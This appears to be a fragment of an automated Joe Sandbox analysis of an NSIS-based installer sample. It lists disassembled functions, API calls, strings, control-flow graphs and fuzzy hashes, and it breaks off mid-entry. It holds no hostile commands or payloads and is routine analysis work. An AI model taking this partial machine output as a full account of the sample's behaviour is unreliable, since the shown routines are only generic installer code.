                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                          Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                          APIs
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-1650083594
                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • lstrcatW.KERNEL32(00000000,00000000,BasicsCommunication,004CB0B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,BasicsCommunication,BasicsCommunication,00000000,00000000,BasicsCommunication,004CB0B0,00000000,00000000), ref: 00401AA0
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: BasicsCommunication$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-3321519224
                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                          Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00403598
                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                          Strings
                                          • Error launching installer, xrefs: 004035D7
                                          • soft, xrefs: 00403675
                                          • Null, xrefs: 0040367E
                                          • Inst, xrefs: 0040366C
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                          Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033E7
                                          • GetTickCount.KERNEL32 ref: 00403464
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                          • wsprintfW.USER32 ref: 004034A4
                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: ... %d%%$P1B$X1C$X1C
                                          • API String ID: 651206458-1535804072
                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                          Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                          APIs
                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                          Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GlobalFree.KERNELBASE(00617D50), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: BasicsCommunication$Exch: stack < %d elements$Pop: stack empty$P}a
                                          • API String ID: 1459762280-2131738396
                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • GlobalFree.KERNELBASE(00617D50), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
